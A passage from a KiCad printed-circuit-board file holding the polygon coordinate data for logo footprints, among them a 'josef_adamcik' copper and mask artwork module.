(xy -0.084822 8.156165) (xy -0.052917 8.162694) (xy 0.042333 8.176222) (xy 0.042333 7.241944)) (layer B.Mask) (width 0.01)) (fp_poly (pts (xy -5.785483 8.159352) (xy -5.760122 8.107712) (xy -5.757333 8.046278) (xy -5.767967 7.954315) (xy -5.814271 7.920003) (xy -5.865979 7.916333) (xy -5.943387 7.928535) (xy -5.964736 7.982684) (xy -5.961229 8.03275) (xy -5.926152 8.128476) (xy -5.852583 8.162694) (xy -5.785483 8.159352)) (layer B.Mask) (width 0.01)) ) (module logos:josef_adamcik_20mm_cu_mask (layer F.Cu) (tedit 0) (tstamp 5DA5287F) (at 116.56 113.91) (fp_text reference Ref** (at 0 0) (layer F.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_text value Val** (at 0 0) (layer F.SilkS) hide (effects (font (size 1.27 1.27) (thickness 0.15))) ) (fp_poly (pts (xy -3.862494 -1.725083) (xy -3.8735 0.232833) (xy -4.3815 0.232833) (xy -4.394787 0.0716) (xy -4.408074 -0.089634) (xy -4.569772 0.056451) (xy -4.771611 0.18615) (xy -5.023829 0.265937) (xy -5.305757 0.291945) (xy -5.59672 0.260305) (xy -5.625135 0.253912) (xy -5.831315 0.172643) (xy -5.990986 0.034111) (xy -6.107517 -0.167076) (xy -6.184274 -0.436311) (xy -6.218636 -0.696236) (xy -6.238589 -1.141321) (xy -6.219345 -1.529005) (xy -6.181505 -1.742998) (xy -5.6515 -1.742998) (xy -5.6515 -0.458336) (xy -5.52801 -0.352115) (xy -5.459988 -0.299706) (xy -5.391202 -0.269373) (xy -5.297991 -0.256557) (xy -5.156692 -0.256698) (xy -5.052707 -0.26053) (xy -4.874248 -0.270556) (xy -4.756906 -0.287007) (xy -4.677131 -0.31651) (xy -4.611374 -0.36569) (xy -4.58353 -0.392546) (xy -4.537228 -0.441112) (xy -4.505055 -0.48876) (xy -4.48444 -0.551105) (xy -4.47281 -0.643765) (xy -4.467594 -0.782357) (xy -4.466218 -0.982498) (xy -4.466167 -1.105102) (xy -4.466167 -1.700279) (xy -4.604418 -1.823806) (xy -4.681221 -1.886363) (xy -4.755007 -1.923302) (xy -4.851358 -1.94129) (xy -4.995854 -1.946996) (xy -5.078307 -1.947333) (xy -5.255009 -1.944135) (xy -5.371887 -1.930833) (xy -5.453663 -1.901871) (xy -5.525057 -1.85169) (xy -5.532723 -1.845166) (xy -5.6515 -1.742998) (xy -6.181505 -1.742998) (xy -6.161778 -1.854555) (xy -6.066762 -2.113234) (xy -5.935169 -2.300306) (xy -5.920203 -2.314732) (xy -5.757693 -2.414737) (xy -5.545247 -2.47391) (xy -5.304817 -2.493603) (xy -5.058357 -2.475167) (xy -4.827819 -2.419955) (xy -4.635156 -2.329319) (xy -4.520025 -2.228513) (xy -4.494224 -2.200431) (xy -4.475305 -2.19624) (xy -4.462183 -2.225922) (xy -4.453774 -2.299459) (xy -4.448992 -2.426832) (xy -4.446755 -2.618023) (xy -4.445977 -2.883013) (xy -4.445941 -2.910417) (xy -4.445 -3.683) (xy -3.851488 -3.683) (xy -3.862494 -1.725083)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -1.913923 -2.471118) (xy -1.691464 -2.461551) (xy -1.506046 -2.447556) (xy -1.377455 -2.429413) (xy -1.3462 -2.420999) (xy -1.172616 -2.321498) (xy -1.023562 -2.167655) (xy -0.923776 -1.987669) (xy -0.903558 -1.916489) (xy -0.894327 -1.828917) (xy -0.885975 -1.671007) (xy -0.878924 -1.457086) (xy -0.873593 -1.20148) (xy -0.870401 -0.918517) (xy -0.86972 -0.762) (xy -0.867833 0.232833) (xy -1.375833 0.232833) (xy -1.418167 -0.092491) (xy -1.524 0.02271) (xy -1.638358 0.120723) (xy -1.765996 0.195916) (xy -1.767332 0.196488) (xy -1.905476 0.234986) (xy -2.095514 0.262614) (xy -2.30512 0.2772) (xy -2.50197 0.276572) (xy -2.653739 0.258558) (xy -2.661801 0.2566) (xy -2.877787 0.167169) (xy -3.03346 0.022583) (xy -3.130906 -0.18036) (xy -3.172212 -0.444859) (xy -3.174005 -0.529167) (xy -3.170776 -0.567339) (xy -2.624667 -0.567339) (xy -2.614368 -0.419248) (xy -2.574898 -0.318178) (xy -2.493394 -0.255626) (xy -2.356997 -0.223088) (xy -2.152843 -0.21206) (xy -2.086749 -0.211667) (xy -1.910063 -0.213961) (xy -1.793539 -0.224882) (xy -1.712714 -0.250493) (xy -1.643122 -0.296854) (xy -1.602824 -0.331555) (xy -1.520911 -0.417993) (xy -1.475745 -0.512204) (xy -1.45265 -0.648464) (xy -1.448747 -0.691389) (xy -1.428849 -0.931333) (xy -1.949341 -0.931333) (xy -2.202537 -0.928505) (xy -2.38326 -0.915665) (xy -2.50363 -0.88628) (xy -2.57577 -0.833816) (xy -2.611801 -0.75174) (xy -2.623844 -0.633519) (xy -2.624667 -0.567339) (xy -3.170776 -0.567339) (xy -3.14958 -0.817867) (xy -3.077454 -1.03836) (xy -2.956523 -1.19313) (xy -2.848273 -1.26101) (xy -2.765667 -1.290841) (xy -2.661786 -1.311339) (xy -2.520878 -1.323894) (xy -2.327191 -1.329898) (xy -2.064971 -1.330743) (xy -2.059226 -1.330718) (xy -1.430286 -1.327936) (xy -1.448187 -1.575417) (xy -1.460279 -1.709882) (xy -1.481938 -1.809548) (xy -1.524571 -1.879627) (xy -1.599583 -1.925325) (xy -1.71838 -1.951855) (xy -1.892368 -1.964424) (xy -2.132953 -1.968242) (xy -2.308825 -1.9685) (xy -3.005715 -1.9685) (xy -3.005691 -2.189944) (xy -3.001932 -2.320848) (xy -2.983152 -2.391728) (xy -2.93804 -2.427142) (xy -2.88925 -2.442774) (xy -2.778405 -2.459531) (xy -2.605663 -2.470465) (xy -2.39081 -2.475855) (xy -2.153634 -2.475979) (xy -1.913923 -2.471118)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 5.863167 -2.485319) (xy 6.082275 -2.470525) (xy 6.230628 -2.452409) (xy 6.322019 -2.423158) (xy 6.370238 -2.374958) (xy 6.389078 -2.299996) (xy 6.392332 -2.19046) (xy 6.392333 -2.185549) (xy 6.392333 -1.967156) (xy 5.933189 -1.982871) (xy 5.708261 -1.98749) (xy 5.548827 -1.982165) (xy 5.436116 -1.965224) (xy 5.351361 -1.934995) (xy 5.341777 -1.930189) (xy 5.250717 -1.874785) (xy 5.185829 -1.808109) (xy 5.142817 -1.71567) (xy 5.117384 -1.582977) (xy 5.105232 -1.395542) (xy 5.102066 -1.138874) (xy 5.102067 -1.121833) (xy 5.108755 -0.815574) (xy 5.134551 -0.584003) (xy 5.188589 -0.417735) (xy 5.280002 -0.307382) (xy 5.417922 -0.243557) (xy 5.611482 -0.216873) (xy 5.869816 -0.217942) (xy 5.976459 -0.223093) (xy 6.392333 -0.246009) (xy 6.392333 -0.0217) (xy 6.383364 0.1282) (xy 6.354231 0.208197) (xy 6.328856 0.226966) (xy 6.238999 0.244981) (xy 6.087607 0.259204) (xy 5.897748 0.269079) (xy 5.692493 0.274048) (xy 5.494909 0.273554) (xy 5.328068 0.267038) (xy 5.215038 0.253944) (xy 5.2148 0.253893) (xy 4.957651 0.164456) (xy 4.763611 0.018615) (xy 4.640705 -0.165527) (xy 4.606732 -0.247145) (xy 4.582489 -0.332345) (xy 4.566376 -0.437005) (xy 4.556797 -0.577004) (xy 4.552152 -0.768223) (xy 4.550842 -1.026541) (xy 4.550833 -1.058333) (xy 4.552469 -1.336669) (xy 4.558274 -1.546131) (xy 4.569597 -1.702465) (xy 4.587786 -1.821416) (xy 4.614187 -1.918732) (xy 4.627664 -1.955944) (xy 4.739771 -2.163003) (xy 4.899376 -2.317477) (xy 5.112543 -2.421965) (xy 5.385332 -2.479063) (xy 5.723808 -2.491369) (xy 5.863167 -2.485319)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -7.348135 -1.62019) (xy -7.216225 -1.250899) (xy -7.092798 -0.905305) (xy -6.980835 -0.591758) (xy -6.883316 -0.318606) (xy -6.803221 -0.094197) (xy -6.74353 0.073119) (xy -6.707224 0.174996) (xy -6.69727 0.203044) (xy -6.706404 0.231638) (xy -6.767668 0.246107) (xy -6.893837 0.248323) (xy -6.986323 0.245378) (xy -7.294542 0.232833) (xy -7.45289 -0.1905) (xy -7.611239 -0.613833) (xy -9.163431 -0.613833) (xy -9.467059 0.232833) (xy -10.074929 0.257701) (xy -9.927357 -0.1569) (xy -9.877186 -0.29745) (xy -9.802997 -0.504732) (xy -9.70943 -0.76581) (xy -9.601125 -1.067748) (xy -9.558918 -1.185333) (xy -8.971926 -1.185333) (xy -7.793089 -1.185333) (xy -7.850518 -1.344083) (xy -7.886741 -1.444427) (xy -7.944022 -1.603343) (xy -8.014758 -1.799736) (xy -8.091351 -2.012511) (xy -8.098364 -2.032) (xy -8.174157 -2.241449) (xy -8.244128 -2.432674) (xy -8.301008 -2.585954) (xy -8.33753 -2.681568) (xy -8.340174 -2.688167) (xy -8.391566 -2.815167) (xy -8.467174 -2.6035) (xy -8.508866 -2.486611) (xy -8.571462 -2.310899) (xy -8.647502 -2.097317) (xy -8.729525 -1.866815) (xy -8.757355 -1.788583) (xy -8.971926 -1.185333) (xy -9.558918 -1.185333) (xy -9.482722 -1.397608) (xy -9.358861 -1.742454) (xy -9.277625 -1.9685) (xy -8.775466 -3.3655) (xy -8.37765 -3.377024) (xy -7.979833 -3.388547) (xy -7.348135 -1.62019)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 1.51609 -2.491298) (xy 1.737204 -2.435831) (xy 1.923376 -2.335862) (xy 2.056224 -2.192311) (xy 2.063995 -2.178977) (xy 2.095455 -2.148212) (xy 2.144081 -2.163679) (xy 2.227584 -2.232733) (xy 2.255 -2.258302) (xy 2.460762 -2.395462) (xy 2.720241 -2.473769) (xy 3.023917 -2.490671) (xy 3.101828 -2.485352) (xy 3.325941 -2.443653) (xy 3.493052 -2.357252) (xy 3.624508 -2.21354) (xy 3.661833 -2.154575) (xy 3.687449 -2.105554) (xy 3.707581 -2.048577) (xy 3.723054 -1.972935) (xy 3.734693 -1.86792) (xy 3.743322 -1.722825) (xy 3.749767 -1.526941) (xy 3.754853 -1.26956) (xy 3.759404 -0.939975) (xy 3.760155 -0.878417) (xy 3.773811 0.254) (xy 3.224049 0.254) (xy 3.210108 -0.765795) (xy 3.205552 -1.08523) (xy 3.200984 -1.33076) (xy 3.195292 -1.513143) (xy 3.187362 -1.643134) (xy 3.176083 -1.73149) (xy 3.16034 -1.788965) (xy 3.13902 -1.826317) (xy 3.111013 -1.8543) (xy 3.096227 -1.866462) (xy 2.986952 -1.915752) (xy 2.827407 -1.943654) (xy 2.649652 -1.948525) (xy 2.485748 -1.928726) (xy 2.402127 -1.901988) (xy 2.334894 -1.866974) (xy 2.282667 -1.823643) (xy 2.243368 -1.761462) (xy 2.214917 -1.669894) (xy 2.195236 -1.538405) (xy 2.182244 -1.356458) (xy 2.173864 -1.113519) (xy 2.168017 -0.799053) (xy 2.166722 -0.709083) (xy 2.153277 0.254) (xy 1.608667 0.254) (xy 1.605576 -0.560917) (xy 1.602006 -0.938177) (xy 1.59385 -1.239234) (xy 1.580187 -1.472472) (xy 1.560092 -1.646276) (xy 1.532642 -1.769031) (xy 1.496914 -1.849119) (xy 1.459205 -1.890015) (xy 1.366191 -1.924013) (xy 1.211076 -1.943759) (xy 1.094936 -1.947333) (xy 0.928913 -1.942334) (xy 0.818592 -1.92252) (xy 0.735352 -1.880673) (xy 0.690277 -1.845249) (xy 0.5715 -1.743164) (xy 0.550333 -0.755165) (xy 0.529167 0.232833) (xy 0.243417 0.245351) (xy -0.042333 0.257868) (xy -0.042333 -2.455333) (xy 0.508 -2.455333) (xy 0.508 -2.103679) (xy 0.649862 -2.24975) (xy 0.826921 -2.38149) (xy 1.042567 -2.465048) (xy 1.278418 -2.501344) (xy 1.51609 -2.491298)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 7.62 0.254) (xy 7.069667 0.254) (xy 7.069667 -2.455333) (xy 7.62 -2.455333) (xy 7.62 0.254)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 9.026903 -2.529417) (xy 9.038167 -1.375833) (xy 9.174028 -1.362696) (xy 9.227047 -1.361476) (xy 9.27663 -1.375184) (xy 9.332552 -1.41305) (xy 9.40459 -1.484306) (xy 9.502519 -1.598181) (xy 9.636115 -1.763907) (xy 9.745528 -1.902305) (xy 10.181167 -2.455051) (xy 10.491728 -2.455192) (xy 10.80229 -2.455333) (xy 10.577949 -2.169583) (xy 10.441557 -1.996348) (xy 10.282388 -1.794907) (xy 10.130463 -1.603244) (xy 10.101129 -1.566333) (xy 9.987534 -1.423211) (xy 9.891703 -1.30197) (xy 9.827446 -1.220105) (xy 9.810839 -1.198564) (xy 9.820533 -1.145903) (xy 9.883741 -1.032238) (xy 10.001015 -0.856723) (xy 10.172903 -0.618512) (xy 10.284014 -0.469633) (xy 10.439419 -0.262162) (xy 10.575791 -0.078058) (xy 10.685464 0.072164) (xy 10.760775 0.177989) (xy 10.794059 0.228898) (xy 10.795 0.231515) (xy 10.75618 0.242415) (xy 10.653749 0.250375) (xy 10.508753 0.253861) (xy 10.488083 0.253906) (xy 10.181167 0.253811) (xy 9.757833 -0.296333) (xy 9.60012 -0.500246) (xy 9.483433 -0.646353) (xy 9.397593 -0.744274) (xy 9.332423 -0.803631) (xy 9.277743 -0.834047) (xy 9.223376 -0.845142) (xy 9.17575 -0.846573) (xy 9.017 -0.846667) (xy 9.017 0.254) (xy 8.466667 0.254) (xy 8.466667 -3.683) (xy 9.015639 -3.683) (xy 9.026903 -2.529417)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 6.148354 -3.677914) (xy 6.215076 -3.66507) (xy 6.223 -3.657839) (xy 6.199707 -3.615135) (xy 6.136806 -3.519678) (xy 6.04476 -3.38699) (xy 5.966116 -3.276839) (xy 5.709232 -2.921) (xy 5.426366 -2.922356) (xy 5.1435 -2.923713) (xy 4.878414 -3.292773) (xy 4.613327 -3.661833) (xy 4.805292 -3.674776) (xy 4.906284 -3.677902) (xy 4.981216 -3.66245) (xy 5.053123 -3.615789) (xy 5.145038 -3.525287) (xy 5.213872 -3.450706) (xy 5.430487 -3.213695) (xy 5.63963 -3.448348) (xy 5.752209 -3.570114) (xy 5.834477 -3.640473) (xy 5.909964 -3.673358) (xy 6.002201 -3.682704) (xy 6.035886 -3.683) (xy 6.148354 -3.677914)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 8.104469 -3.58775) (xy 8.040014 -3.514969) (xy 7.934837 -3.401354) (xy 7.807341 -3.266676) (xy 7.749793 -3.20675) (xy 7.618331 -3.072837) (xy 7.525074 -2.989011) (xy 7.450346 -2.943566) (xy 7.374468 -2.9248) (xy 7.277764 -2.921007) (xy 7.269387 -2.921) (xy 7.144789 -2.926894) (xy 7.092979 -2.946852) (xy 7.095614 -2.973917) (xy 7.132615 -3.030099) (xy 7.206154 -3.136837) (xy 7.303539 -3.275806) (xy 7.359525 -3.354917) (xy 7.592493 -3.683) (xy 8.183455 -3.683) (xy 8.104469 -3.58775)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -8.382 -4.728633) (xy -8.377068 -4.474941) (xy -8.362395 -4.301066) (xy -8.338169 -4.20895) (xy -8.3312 -4.199467) (xy -8.24722 -4.162502) (xy -8.118261 -4.150279) (xy -7.980102 -4.162113) (xy -7.868524 -4.197317) (xy -7.850341 -4.208678) (xy -7.813385 -4.245883) (xy -7.788142 -4.30443) (xy -7.771624 -4.400696) (xy -7.760846 -4.551055) (xy -7.753838 -4.737845) (xy -7.739509 -5.207) (xy -7.524669 -5.207) (xy -7.545401 -4.47675) (xy -7.554031 -4.2319) (xy -7.564897 -4.01292) (xy -7.576978 -3.8354) (xy -7.589253 -3.714932) (xy -7.598197 -3.670851) (xy -7.680371 -3.572787) (xy -7.831793 -3.508206) (xy -8.056321 -3.47585) (xy -8.210565 -3.471333) (xy -8.38038 -3.473261) (xy -8.482397 -3.481683) (xy -8.533446 -3.50056) (xy -8.550357 -3.533852) (xy -8.551333 -3.551518) (xy -8.541972 -3.592219) (xy -8.502713 -3.61811) (xy -8.416799 -3.633942) (xy -8.26747 -3.644468) (xy -8.214555 -3.646996) (xy -8.049825 -3.659895) (xy -7.916225 -3.680321) (xy -7.837807 -3.704342) (xy -7.830215 -3.709852) (xy -7.795081 -3.779481) (xy -7.76517 -3.89556) (xy -7.758572 -3.936948) (xy -7.734491 -4.116482) (xy -7.835996 -4.052944) (xy -7.959202 -3.993212) (xy -8.055503 -3.961999) (xy -8.191577 -3.954671) (xy -8.340559 -3.981769) (xy -8.470405 -4.034038) (xy -8.549072 -4.102225) (xy -8.550614 -4.104988) (xy -8.567466 -4.17747) (xy -8.581226 -4.314686) (xy -8.590441 -4.496718) (xy -8.593667 -4.696217) (xy -8.593667 -5.207) (xy -8.382 -5.207) (xy -8.382 -4.728633)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -9.918423 -5.796404) (xy -9.887169 -5.775488) (xy -9.87087 -5.720227) (xy -9.864659 -5.613929) (xy -9.863667 -5.439901) (xy -9.863667 -5.073855) (xy -9.752124 -5.161594) (xy -9.610159 -5.227562) (xy -9.432107 -5.248409) (xy -9.254836 -5.221978) (xy -9.186333 -5.194689) (xy -9.082997 -5.096414) (xy -9.013218 -4.927037) (xy -8.9798 -4.694342) (xy -8.977292 -4.614333) (xy -8.989539 -4.361806) (xy -9.03402 -4.179495) (xy -9.114281 -4.057959) (xy -9.209064 -3.997118) (xy -9.404651 -3.945951) (xy -9.608587 -3.962279) (xy -9.630833 -3.967448) (xy -9.734623 -4.013398) (xy -9.784353 -4.049031) (xy -9.840847 -4.087849) (xy -9.870981 -4.062207) (xy -9.878274 -4.044661) (xy -9.936317 -3.990846) (xy -9.989338 -3.979333) (xy -10.017639 -3.982243) (xy -10.038934 -3.997992) (xy -10.05422 -4.03711) (xy -10.064492 -4.11013) (xy -10.070744 -4.22758) (xy -10.073971 -4.399992) (xy -10.074942 -4.593167) (xy -9.863667 -4.593167) (xy -9.851368 -4.39031) (xy -9.808277 -4.257129) (xy -9.725104 -4.181407) (xy -9.592558 -4.150928) (xy -9.525624 -4.148667) (xy -9.360119 -4.165082) (xy -9.25677 -4.211476) (xy -9.252857 -4.215191) (xy -9.213873 -4.285011) (xy -9.192624 -4.407426) (xy -9.186333 -4.593167) (xy -9.194285 -4.793107) (xy -9.22532 -4.923387) (xy -9.290204 -4.998116) (xy -9.399707 -5.0314) (xy -9.525624 -5.037667) (xy -9.679896 -5.021494) (xy -9.781181 -4.964833) (xy -9.838768 -4.855467) (xy -9.861947 -4.681181) (xy -9.863667 -4.593167) (xy -10.074942 -4.593167) (xy -10.075168 -4.637897) (xy -10.075333 -4.8895) (xy -10.075333 -5.799667) (xy -9.9695 -5.799667) (xy -9.918423 -5.796404)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 3.298341 -6.701738) (xy 3.520519 -6.678708) (xy 3.685512 -6.636058) (xy 3.806631 -6.569994) (xy 3.897187 -6.47672) (xy 3.916176 -6.449369) (xy 3.969679 -6.319083) (xy 4.009001 -6.125692) (xy 4.034265 -5.887778) (xy 4.045591 -5.623927) (xy 4.043102 -5.352723) (xy 4.026918 -5.092749) (xy 3.997161 -4.862592) (xy 3.953951 -4.680835) (xy 3.903936 -4.574367) (xy 3.768179 -4.459091) (xy 3.557864 -4.378635) (xy 3.275977 -4.333832) (xy 3.005667 -4.324186) (xy 2.812218 -4.328706) (xy 2.635736 -4.338689) (xy 2.503923 -4.352341) (xy 2.466977 -4.359103) (xy 2.247704 -4.448944) (xy 2.086344 -4.599836) (xy 2.043464 -4.667649) (xy 2.015138 -4.731303) (xy 1.994788 -4.811874) (xy 1.981184 -4.923431) (xy 1.973094 -5.080047) (xy 1.969288 -5.295794) (xy 1.9685 -5.5245) (xy 1.968515 -5.52923) (xy 2.455333 -5.52923) (xy 2.458154 -5.252362) (xy 2.472543 -5.049216) (xy 2.507386 -4.90889) (xy 2.57157 -4.82048) (xy 2.673982 -4.773084) (xy 2.82351 -4.755801) (xy 3.029039 -4.757727) (xy 3.082649 -4.759646) (xy 3.276462 -4.774545) (xy 3.401031 -4.803783) (xy 3.463649 -4.842502) (xy 3.496324 -4.892253) (xy 3.51939 -4.975038) (xy 3.535119 -5.105848) (xy 3.545777 -5.299674) (xy 3.549469 -5.40959) (xy 3.554267 -5.687943) (xy 3.547625 -5.89448) (xy 3.526183 -6.041669) (xy 3.486582 -6.141974) (xy 3.425461 -6.207861) (xy 3.339462 -6.251795) (xy 3.320675 -6.258472) (xy 3.141147 -6.293155) (xy 2.915851 -6.296697) (xy 2.880306 -6.294379) (xy 2.726448 -6.278404) (xy 2.614976 -6.249196) (xy 2.539088 -6.194509) (xy 2.491984 -6.1021) (xy 2.466863 -5.959723) (xy 2.456925 -5.755135) (xy 2.455333 -5.52923) (xy 1.968515 -5.52923) (xy 1.969407 -5.792992) (xy 1.973087 -5.991368) (xy 1.980977 -6.134166) (xy 1.994517 -6.235927) (xy 2.015145 -6.311189) (xy 2.044298 -6.374494) (xy 2.054345 -6.392333) (xy 2.141498 -6.512883) (xy 2.251311 -6.600158) (xy 2.397382 -6.658685) (xy 2.593314 -6.692991) (xy 2.852706 -6.707601) (xy 3.005667 -6.708944) (xy 3.298341 -6.701738)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 5.734944 -6.705715) (xy 5.924259 -6.698353) (xy 6.070697 -6.68778) (xy 6.148917 -6.676174) (xy 6.221961 -6.647087) (xy 6.255846 -6.594286) (xy 6.265141 -6.490451) (xy 6.265333 -6.457894) (xy 6.265333 -6.271067) (xy 5.721926 -6.278784) (xy 5.466307 -6.27978) (xy 5.283276 -6.271225) (xy 5.160894 -6.248403) (xy 5.08722 -6.206601) (xy 5.050315 -6.141106) (xy 5.038238 -6.047204) (xy 5.037667 -6.008648) (xy 5.045327 -5.899552) (xy 5.0643 -5.832978) (xy 5.069876 -5.82709) (xy 5.122239 -5.813827) (xy 5.240853 -5.792499) (xy 5.408025 -5.766067) (xy 5.602796 -5.73794) (xy 5.849798 -5.701103) (xy 6.026856 -5.665937) (xy 6.148348 -5.626486) (xy 6.228654 -5.576798) (xy 6.28215 -5.510916) (xy 6.315144 -5.442948) (xy 6.352359 -5.29156) (xy 6.366143 -5.097592) (xy 6.357393 -4.894788) (xy 6.327008 -4.716888) (xy 6.293384 -4.625316) (xy 6.224511 -4.514498) (xy 6.14316 -4.436263) (xy 6.033637 -4.384797) (xy 5.880247 -4.354289) (xy 5.667296 -4.338927) (xy 5.508423 -4.334633) (xy 5.290876 -4.333493) (xy 5.084426 -4.337219) (xy 4.915448 -4.345074) (xy 4.826 -4.353684) (xy 4.6355 -4.3815) (xy 4.610032 -4.775398) (xy 5.202223 -4.768949) (xy 5.450065 -4.769406) (xy 5.64609 -4.776232) (xy 5.779338 -4.788787) (xy 5.83858 -4.806156) (xy 5.892953 -4.907324) (xy 5.910227 -5.03944) (xy 5.886405 -5.157711) (xy 5.872115 -5.181858) (xy 5.822684 -5.223312) (xy 5.73358 -5.257173) (xy 5.589942 -5.287518) (xy 5.376913 -5.318425) (xy 5.37207 -5.319047) (xy 5.174688 -5.347541) (xy 4.997364 -5.378817) (xy 4.864338 -5.408311) (xy 4.81342 -5.424236) (xy 4.691354 -5.510263) (xy 4.612211 -5.654421) (xy 4.572855 -5.864165) (xy 4.567033 -6.009555) (xy 4.579776 -6.239179) (xy 4.625528 -6.41474) (xy 4.713121 -6.542688) (xy 4.851387 -6.629473) (xy 5.049157 -6.681543) (xy 5.315263 -6.705348) (xy 5.5245 -6.70873) (xy 5.734944 -6.705715)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 8.077081 -6.718202) (xy 8.341611 -6.68423) (xy 8.541733 -6.620735) (xy 8.68635 -6.517507) (xy 8.784366 -6.364335) (xy 8.844685 -6.151011) (xy 8.876209 -5.867324) (xy 8.880024 -5.797443) (xy 8.90199 -5.334) (xy 7.354989 -5.334) (xy 7.376995 -5.138758) (xy 7.397795 -5.005046) (xy 7.433584 -4.907269) (xy 7.496355 -4.839928) (xy 7.598103 -4.797522) (xy 7.750822 -4.774553) (xy 7.966505 -4.76552) (xy 8.192902 -4.764634) (xy 8.805333 -4.766768) (xy 8.805333 -4.372395) (xy 8.545123 -4.345197) (xy 8.307809 -4.328353) (xy 8.048498 -4.322889) (xy 7.794329 -4.328282) (xy 7.572435 -4.344007) (xy 7.421213 -4.366904) (xy 7.212095 -4.454827) (xy 7.049275 -4.607389) (xy 6.946989 -4.81087) (xy 6.941842 -4.828959) (xy 6.917055 -4.973858) (xy 6.90088 -5.176525) (xy 6.893253 -5.41308) (xy 6.894113 -5.659644) (xy 6.896321 -5.715) (xy 7.354492 -5.715) (xy 8.424333 -5.715) (xy 8.424333 -5.861175) (xy 8.395729 -6.055999) (xy 8.308369 -6.193391) (xy 8.159936 -6.27495) (xy 7.94811 -6.302278) (xy 7.797328 -6.294122) (xy 7.608407 -6.257235) (xy 7.485674 -6.184033) (xy 7.413601 -6.060361) (xy 7.381968 -5.915463) (xy 7.354492 -5.715) (xy 6.896321 -5.715) (xy 6.903398 -5.892339) (xy 6.921046 -6.087285) (xy 6.945441 -6.215566) (xy 7.047561 -6.417664) (xy 7.216344 -6.57005) (xy 7.449051 -6.671508) (xy 7.742942 -6.720821) (xy 8.077081 -6.718202)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 1.262071 -6.12775) (xy 1.257809 -5.702375) (xy 1.251865 -5.353789) (xy 1.240943 -5.074131) (xy 1.221741 -4.855537) (xy 1.190962 -4.690146) (xy 1.145306 -4.570095) (xy 1.081473 -4.487523) (xy 0.996166 -4.434568) (xy 0.886083 -4.403366) (xy 0.747928 -4.386058) (xy 0.578399 -4.374779) (xy 0.525164 -4.371649) (xy 0.127 -4.347894) (xy 0.127 -4.773911) (xy 0.355099 -4.80241) (xy 0.460884 -4.814749) (xy 0.545358 -4.828348) (xy 0.611003 -4.852034) (xy 0.660297 -4.894634) (xy 0.695721 -4.964975) (xy 0.719753 -5.071884) (xy 0.734874 -5.224188) (xy 0.743563 -5.430714) (xy 0.7483 -5.700289) (xy 0.751564 -6.04174) (xy 0.753198 -6.219542) (xy 0.765562 -7.493) (xy 1.27531 -7.493) (xy 1.262071 -6.12775)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy 10.837333 -7.376484) (xy 10.607066 -7.357389) (xy 10.43141 -7.333735) (xy 10.323277 -7.286792) (xy 10.266867 -7.199174) (xy 10.24638 -7.053496) (xy 10.244667 -6.95865) (xy 10.244667 -6.688667) (xy 10.837333 -6.688667) (xy 10.837333 -6.265333) (xy 10.244667 -6.265333) (xy 10.244667 -4.360333) (xy 9.736667 -4.360333) (xy 9.736667 -6.265333) (xy 9.271 -6.265333) (xy 9.271 -6.688667) (xy 9.724117 -6.688667) (xy 9.749779 -7.021435) (xy 9.779253 -7.279306) (xy 9.829959 -7.465359) (xy 9.914237 -7.591972) (xy 10.044431 -7.671527) (xy 10.232882 -7.716402) (xy 10.463586 -7.737434) (xy 10.837333 -7.758744) (xy 10.837333 -7.376484)) (layer F.Cu) (width 0.01)) (fp_poly (pts (xy -4.327098 -7.617196) (xy -4.304882 -7.601208) (xy -4.289991 -7.560676) (xy -4.28135 -7.484236) (xy -4.277882 -7.360529) (xy -4.278511 -7.178191) (xy -4.282161 -6.925861) (xy -4.283632 -6.837905) (xy -4.288767 -6.561711) (xy -4.29456 -6.357336) (xy -4.302612 -6.211938) (xy -4.314526 -6.112674) (xy -4.331904 -6.046701) (xy -4.356347 -6.001178) (xy -4.389458 -5.963262) (xy -4.393213 -5.959489) (xy -4.452875 -5.911116) (xy -4.52841 -5.880261) (xy -4.641226 -5.861837) (xy -4.812733 -5.850758) (xy -4.85888 -5.848863) (xy -5.028567 -5.845865) (xy -5.16512 -5.850122) (xy -5.247142 -5.860691) (xy -5.259917 -5.866502) (xy -5.289931 -5.934777) (xy -5.291667 -5.954889) (xy -5.267388 -5.98589) (xy -5.186497 -6.003862) (xy -5.036913 -6.010986) (xy -4.978857 -6.011333) (xy -4.767282 -6.02227) (xy -4.623583 -6.060994) (xy -4.533109 -6.13638) (xy -4.481208 -6.257302) (xy -4.467901 -6.320796) (xy -4.440209 -6.482092) (xy -4.544662 -6.413651) (xy -4.675079 -6.364444) (xy -4.846276 -6.34494) (xy -5.021062 -6.355402) (xy -5.162245 -6.396093) (xy -5.18507 -6.409107) (xy -5.2599 -6.485084) (xy -5.307381 -6.604014) (xy -5.330016 -6.778009) (xy -5.330235 -6.955586) (xy -5.136445 -6.955586) (xy -5.132747 -6.782535) (xy -5.118845 -6.67365) (xy -5.090526 -6.608641) (xy -5.057798 -6.576841) (xy -4.933138 -6.529086) (xy -4.77721 -6.524335) (xy -4.630675 -6.560931) (xy -4.570465 -6.596731) (xy -4.519394 -6.649054) (xy -4.490392 -6.71793) (xy -4.477538 -6.826884) (xy -4.474883 -6.976476) (xy -4.481752 -7.172399) (xy -4.509817 -7.298891) (xy -4.570264 -7.370593) (xy -4.674279 -7.402145) (xy -4.804833 -7.408333) (xy -4.952305 -7.399875) (xy -5.048654 -7.364899) (xy -5.104428 -7.289004) (xy -5.130175 -7.157787) (xy -5.136444 -6.956847) (xy -5.136445 -6.955586) (xy -5.330235 -6.955586) (xy -5.330314 -7.019182) (xy -5.327008 -7.095051) (xy -5.315639 -7.263806) (xy -5.297141 -7.372327) (xy -5.263565 -7.445042) (xy -5.206962 -7.506379) (xy -5.187652 -7.523341) (xy -5.100118 -7.586679) (xy -5.009952 -7.613797) (xy -4.881261 